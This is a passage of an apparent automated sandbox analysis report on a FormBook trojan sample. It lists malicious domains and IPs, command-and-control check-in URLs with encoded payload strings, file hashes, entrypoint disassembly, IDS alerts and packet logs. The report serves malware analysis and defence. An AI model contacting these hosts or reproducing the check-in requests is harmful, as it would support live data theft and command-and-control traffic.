                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://fontfabrik.comexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referraserver.exe, 0000000D.00000002.513072851.00000000052E2000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.fonts.comexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sandoll.co.krexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.aizaibali.com/raserver.exe, 0000000D.00000002.509297575.0000000003078000.00000004.00000020.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://www.sakkal.comexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGNraserver.exe, 0000000D.00000002.509297575.0000000003078000.00000004.00000020.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      95.215.210.10
                                                                      		cochez.clubRussian Federation
                                                                      		49055NEWIT-ASRUtrue
                                                                      172.104.157.41
                                                                      		vermogenswerte.comUnited States
                                                                      		63949LINODE-APLinodeLLCUStrue
                                                                      34.102.136.180
                                                                      		extinctionbrews.comUnited States
                                                                      		15169GOOGLEUSfalse
                                                                      75.2.81.221
                                                                      		825610.parkingcrew.netUnited States
                                                                      		16509AMAZON-02USfalse
                                                                      154.88.31.204
                                                                      		www.aizaibali.comSeychelles
                                                                      		40065CNSERVERSUStrue

                                                                      General Information

                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                      Analysis ID:452687
                                                                      Start date:22.07.2021
                                                                      Start time:18:03:21
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 53s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Sample file name:pMbPS8nCm1.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:23
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/0@13/5
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 29.3% (good quality ratio 25.4%)
                                                                      • Quality average: 71.1%
                                                                      • Quality standard deviation: 33.7%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 64
                                                                      • Number of non-executed functions: 18
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.193.48, 23.35.236.56, 20.82.209.183, 23.216.77.132, 23.216.77.146, 13.107.4.50, 51.103.5.186, 40.112.88.60, 80.67.82.211, 80.67.82.235
                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, Edge-Prod-FRA.env.au.au-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, a767.dscg3.akamai.net, afdap.au.au-msedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      95.215.210.10QxnlprRUTx.exeGet hashmaliciousBrowse
                                                                      • www.cochez.club/dy8g/?Jn=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKjmEwKzzqjxp&2dM8l=bXbDpfbx6FA04L
                                                                      quote.exeGet hashmaliciousBrowse
                                                                      • www.oilepp.club/sgs8/?5joX=g/kFtZKPlgxqAQoU+wlNBUIJLf9Fcx+iYtqxvXVhE+9z/b8eYGNe36RCp3BFC2pgwHcV&D2M8=n6Aht2thEVdHtFzP
                                                                      RzLicilE0b.exeGet hashmaliciousBrowse
                                                                      • www.cochez.club/dy8g/?cPwPC=GvDdgdCxmzC8AL&Jj8hf8=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKjmEwKzzqjxp
                                                                      letterhead.exeGet hashmaliciousBrowse
                                                                      • www.rapurp.club/epms/?Cj30v=9rJhur7HoF7lOxC&x4uDfZgH=K5/mSQXSr23x/w/wVuTeR0A48OUt6IqKG3U9if3kYnbI39O8+SeWAMufgZ7J/RGM/FJB
                                                                      PO6543.exeGet hashmaliciousBrowse
                                                                      • www.zirrema.club/arug/?kfLlf8=WePorOziRm3dT6K3hneQ6fmiCjwbDaqEtdfFV6ZB0ObBVUAf2E30+4A2y/BajiHRCQCm&Yf0=ybFLLTR8hZjhx2
                                                                      DH7v8T4xFa.exeGet hashmaliciousBrowse
                                                                      • www.ouitum.club/nsag/?r6A=oyuKyynVjO0A9ce0TXUJOkg+PRrvkOYQG7y0ZxIeGgkEVxubI4D8c/ZpyjqbTZI03xFO&rVIDm=GBODAlxxjbuxRT
                                                                      ZTRADE0021.exeGet hashmaliciousBrowse
                                                                      • www.deitey.club/i8rz/?9r4P-=1ysJ3lWopnxW9GefGIty5IYzVShJJI8DXw1o7bIqniwmmXQsizYOZMj1tVFT/eUIzFsn+AWcxA==&1bS=WHrpCdQ08
                                                                      q5oRsfy1vk.exeGet hashmaliciousBrowse
                                                                      • www.leteva.club/w8en/?jrQDTX=t8bLyeK0DI5vLwV8yQwzQWSFYhc1yG8ON0Rl7Rqkh6Hs61Z4hvVeNgM7YBsF6F3Pp/Tj&K2JxgH=Exop8hRXRdA
                                                                      Sf6jgQc6Ww.exeGet hashmaliciousBrowse
                                                                      • www.keboate.club/oean/?5j=UjPt&DvjTU=QSIVnL8HxXhFJqDnObQFTaTfjHXZPmA+lfnypz2XDw+CpSlLz9CtCX9/im7M/Rpd1AtY
                                                                      btVnDhh5K7.exeGet hashmaliciousBrowse
                                                                      • www.keboate.club/oean/?Tj=YvFHu&wxl=QSIVnL8HxXhFJqDnObQFTaTfjHXZPmA+lfnypz2XDw+CpSlLz9CtCX9/im7M/Rpd1AtY
                                                                      bin.exeGet hashmaliciousBrowse
                                                                      • www.codedad.club/oncs/?tXUd=WDabN1kLr0eeaEJi5hB0qY/SQqmTyVeMQxg3iiKOowrTZ05AQIKvczEBWaeH6gSgjhMc&2ddpC=ftxDHdNX
                                                                      Order No. BCM190282.exeGet hashmaliciousBrowse
                                                                      • www.gourgio.club/w8en/?rvR86T=5YwAZxfr8BO/v8TT5gfgL0uEKqiEK71WcuoEStVUpKXrZ2OiCHsQMJK9T6jPO8wO+q3l&1bw=L6Ahp0_8jf-htd6p
                                                                      Shipping INVOICE-BL Shipment..exeGet hashmaliciousBrowse
                                                                      • www.wastie.club/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly
                                                                      172.104.157.41RzLicilE0b.exeGet hashmaliciousBrowse
                                                                      • www.vermogenswerte.com/dy8g/?cPwPC=GvDdgdCxmzC8AL&Jj8hf8=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2LpAM6isw8Zs
                                                                      75.2.81.221PQMW0W5h3X.exeGet hashmaliciousBrowse
                                                                      • www.thenorthgoldline.com/dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w==
                                                                      Shipping Documents C1216.exeGet hashmaliciousBrowse
                                                                      • www.helpwithgre.com/fhg5/?idFt5Lt8=2UtB8DcbqqUNdGGafXCP7IZK2b+ICtd8++zQoCDv+Hjw8z9Bnq28qASc6PfUd7Mbl5s7loQVOw==&TZ=EjUt0xR

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      www.aizaibali.comv8kZUFgdD4.exeGet hashmaliciousBrowse
                                                                      • 154.88.31.204
                                                                      QxnlprRUTx.exeGet hashmaliciousBrowse
                                                                      • 154.88.31.204
                                                                      w3Qf2wBNX7.exeGet hashmaliciousBrowse
                                                                      • 154.88.31.204
                                                                      825610.parkingcrew.netPQMW0W5h3X.exeGet hashmaliciousBrowse
                                                                      • 75.2.81.221
                                                                      Shipping Documents C1216.exeGet hashmaliciousBrowse
                                                                      • 75.2.81.221
                                                                      47DOC008699383837383 PDF.exeGet hashmaliciousBrowse
                                                                      • 54.72.9.115
                                                                      29SCAN 0750.exeGet hashmaliciousBrowse
                                                                      • 54.72.9.115
                                                                      www.garimpeirastore.onlineQxnlprRUTx.exeGet hashmaliciousBrowse
                                                                      • 209.99.40.222
                                                                      seBe6bgLTw.exeGet hashmaliciousBrowse
                                                                      • 209.99.40.222
                                                                      0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                      • 209.99.40.222

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      LINODE-APLinodeLLCUSGw6boin32F.exeGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      Swift-Payment_Details.xlsxGet hashmaliciousBrowse
                                                                      • 173.255.194.134
                                                                      2fZSExq7dm.exeGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      9QFzJlxaTl.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      CefN2XNyFiGet hashmaliciousBrowse
                                                                      • 45.79.143.159
                                                                      lovemetertok.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      Item_positions_receipt_564965.xlsmGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      Signed PEARLTECH contract and PO.exeGet hashmaliciousBrowse
                                                                      • 173.255.194.134
                                                                      XfKsLIPLUuGet hashmaliciousBrowse
                                                                      • 50.116.8.237
                                                                      Reciept 2868661.xlsbGet hashmaliciousBrowse
                                                                      • 178.79.147.66
                                                                      nO9g6aIpZp.exeGet hashmaliciousBrowse
                                                                      • 178.79.130.185
                                                                      zgMatT7LEs.exeGet hashmaliciousBrowse
                                                                      • 66.175.218.106
                                                                      borderCurr.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      triage_dropped_file.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      vZksc78XID.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      mormanti.exeGet hashmaliciousBrowse
                                                                      • 66.228.49.173
                                                                      6J08VVHWxd.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      HocVKWxT9F.dllGet hashmaliciousBrowse
                                                                      • 176.58.123.25
                                                                      deepRats.exeGet hashmaliciousBrowse
                                                                      • 45.79.108.130
                                                                      NEWIT-ASRUQxnlprRUTx.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      quote.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      RzLicilE0b.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      letterhead.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      PO6543.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      DH7v8T4xFa.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      ZTRADE0021.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      q5oRsfy1vk.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      Sf6jgQc6Ww.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      btVnDhh5K7.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      bin.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      Order No. BCM190282.exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10
                                                                      Shipping INVOICE-BL Shipment..exeGet hashmaliciousBrowse
                                                                      • 95.215.210.10

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      No created / dropped files found

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.971119501388661
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:pMbPS8nCm1.exe
                                                                      File size:177067
                                                                      MD5:de87f1794377537dda721afd9137e491
                                                                      SHA1:3b0480a4afe176722d9b8cf6f9f9c9257b1d132f
                                                                      SHA256:b0a684c7dfc5a94e3dd2edcb1c706eae088ff9d701ec55f0adb1ae977e5e9081
                                                                      SHA512:7916fe93f72a025663540894ca5c7678e345870bc32e54af6224394b2d1bd3991adbf9097d0d8af67363fa4e3ae0ec00ab407b0a5a24ffec2652457420d4aa14
                                                                      SSDEEP:3072:vMWOOOOOOOOOOOOOOHQ47MB3Fvd3cvtS99ZwlRtlL79ZF5/CGnrN8pCcFOOZPJIZ:EWOOOOOOOOOOOOOOH9sxd3+S9CRtlhEE
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Wtz.Wtz.Wtz.^...Ztz.Wt{.Itz.^...Vtz.^...Vtz.RichWtz.................PE..L...q..`.....................................0....@

                                                                      File Icon

                                                                      Icon Hash:00828e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x401000
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x60F8EC71 [Thu Jul 22 03:56:33 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:0
                                                                      File Version Major:5
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:10de39a2884c15c1630de9015f14f501

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 00000678h
                                                                      mov byte ptr [ebp-00000290h], FFFFFFE9h
                                                                      mov byte ptr [ebp-0000028Fh], FFFFFF90h
                                                                      mov byte ptr [ebp-0000028Eh], 00000000h
                                                                      mov byte ptr [ebp-0000028Dh], 00000000h
                                                                      mov byte ptr [ebp-0000028Ch], 00000000h
                                                                      mov byte ptr [ebp-0000028Bh], 00000055h
                                                                      mov byte ptr [ebp-0000028Ah], FFFFFF8Bh
                                                                      mov byte ptr [ebp-00000289h], FFFFFFECh
                                                                      mov byte ptr [ebp-00000288h], 00000056h
                                                                      mov byte ptr [ebp-00000287h], FFFFFF8Bh
                                                                      mov byte ptr [ebp-00000286h], 00000075h
                                                                      mov byte ptr [ebp-00000285h], 00000008h
                                                                      mov byte ptr [ebp-00000284h], FFFFFFBAh
                                                                      mov byte ptr [ebp-00000283h], 00000073h
                                                                      mov byte ptr [ebp-00000282h], 00000014h
                                                                      mov byte ptr [ebp-00000281h], 00000000h
                                                                      mov byte ptr [ebp-00000280h], 00000000h
                                                                      mov byte ptr [ebp-0000027Fh], 00000057h
                                                                      mov byte ptr [ebp-0000027Eh], FFFFFFEBh
                                                                      mov byte ptr [ebp-0000027Dh], 0000000Eh
                                                                      mov byte ptr [ebp-0000027Ch], FFFFFF8Bh
                                                                      mov byte ptr [ebp-0000027Bh], FFFFFFCAh
                                                                      mov byte ptr [ebp-0000027Ah], FFFFFFD1h
                                                                      mov byte ptr [ebp-00000279h], FFFFFFE8h
                                                                      mov byte ptr [ebp-00000278h], FFFFFFC1h
                                                                      mov byte ptr [ebp-00000277h], FFFFFFE1h
                                                                      mov byte ptr [ebp-00000276h], 00000007h
                                                                      mov byte ptr [ebp+00000000h], 00000000h

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [LNK] VS2008 SP1 build 30729

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x30900x8c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x30000x90.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x11420x1200False0.485677083333data4.74207504229IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x30000x3fc0x400False0.5732421875data4.71317659598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Imports

                                                                      DLLImport
                                                                      USER32.dllGrayStringA, GetDC
                                                                      GDI32.dllGetWorldTransform, GetTextMetricsW, SelectObject, AddFontResourceExA, GdiArtificialDecrementDriver, SetBoundsRect, CreateCompatibleDC
                                                                      SHLWAPI.dllStrNCatW, SHRegOpenUSKeyW, UrlUnescapeA, PathFindExtensionW, UrlEscapeW, PathCombineW, PathIsSystemFolderA, StrCmpW
                                                                      WINSPOOL.DRVGetPrinterDataExW, ConnectToPrinterDlg, DevQueryPrint, ConfigurePortA, DeviceCapabilitiesA, DeletePrinterDriverA
                                                                      MSVFW32.dllDrawDibBegin, MCIWndCreate, ICClose
                                                                      AVIFIL32.dllAVIMakeStreamFromClipboard, AVIStreamOpenFromFileA

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      07/22/21-18:05:29.842456TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.534.102.136.180
                                                                      07/22/21-18:05:29.842456TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.534.102.136.180
                                                                      07/22/21-18:05:29.842456TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.534.102.136.180
                                                                      07/22/21-18:05:29.980778TCP1201ATTACK-RESPONSES 403 Forbidden804973534.102.136.180192.168.2.5
                                                                      07/22/21-18:05:40.590605TCP1201ATTACK-RESPONSES 403 Forbidden804973634.102.136.180192.168.2.5
                                                                      07/22/21-18:05:45.704566TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.5172.104.157.41
                                                                      07/22/21-18:05:45.704566TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.5172.104.157.41
                                                                      07/22/21-18:05:45.704566TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.5172.104.157.41
                                                                      07/22/21-18:05:51.027598TCP1201ATTACK-RESPONSES 403 Forbidden804974075.2.81.221192.168.2.5
                                                                      07/22/21-18:06:08.622399TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.534.102.136.180
                                                                      07/22/21-18:06:08.622399TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.534.102.136.180
                                                                      07/22/21-18:06:08.622399TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.534.102.136.180
                                                                      07/22/21-18:06:08.765433TCP1201ATTACK-RESPONSES 403 Forbidden804974334.102.136.180192.168.2.5
                                                                      07/22/21-18:06:29.722039TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.5209.99.40.222
                                                                      07/22/21-18:06:29.722039TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.5209.99.40.222
                                                                      07/22/21-18:06:29.722039TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.5209.99.40.222

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jul 22, 2021 18:05:24.420397043 CEST4973480192.168.2.595.215.210.10
                                                                      Jul 22, 2021 18:05:24.558319092 CEST804973495.215.210.10192.168.2.5
                                                                      Jul 22, 2021 18:05:24.565618992 CEST4973480192.168.2.595.215.210.10
                                                                      Jul 22, 2021 18:05:24.568625927 CEST4973480192.168.2.595.215.210.10
                                                                      Jul 22, 2021 18:05:24.706835985 CEST804973495.215.210.10192.168.2.5
                                                                      Jul 22, 2021 18:05:24.706911087 CEST804973495.215.210.10192.168.2.5
                                                                      Jul 22, 2021 18:05:24.707521915 CEST804973495.215.210.10192.168.2.5
                                                                      Jul 22, 2021 18:05:24.709042072 CEST4973480192.168.2.595.215.210.10
                                                                      Jul 22, 2021 18:05:24.709491968 CEST4973480192.168.2.595.215.210.10
                                                                      Jul 22, 2021 18:05:24.858376026 CEST804973495.215.210.10192.168.2.5
                                                                      Jul 22, 2021 18:05:29.799993992 CEST4973580192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:29.842174053 CEST804973534.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:29.842305899 CEST4973580192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:29.842456102 CEST4973580192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:29.884633064 CEST804973534.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:29.980777979 CEST804973534.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:29.980814934 CEST804973534.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:29.980947971 CEST4973580192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:29.981005907 CEST4973580192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:30.282537937 CEST4973580192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:30.325236082 CEST804973534.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:40.409492016 CEST4973680192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:40.451663971 CEST804973634.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:40.452857018 CEST4973680192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:40.453010082 CEST4973680192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:40.494915009 CEST804973634.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:40.590605021 CEST804973634.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:40.590624094 CEST804973634.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:40.590764999 CEST4973680192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:40.590826035 CEST4973680192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:40.892844915 CEST4973680192.168.2.534.102.136.180
                                                                      Jul 22, 2021 18:05:40.934571981 CEST804973634.102.136.180192.168.2.5
                                                                      Jul 22, 2021 18:05:45.662502050 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.704116106 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.704224110 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.704566002 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.746088982 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750137091 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750384092 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750467062 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.750477076 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750710964 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750773907 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.750792980 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750893116 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.750974894 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.751004934 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.751007080 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.751020908 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.751085997 CEST8049739172.104.157.41192.168.2.5
                                                                      Jul 22, 2021 18:05:45.751219988 CEST4973980192.168.2.5172.104.157.41
                                                                      Jul 22, 2021 18:05:45.751271963 CEST4973980192.168.2.5172.104.157.41
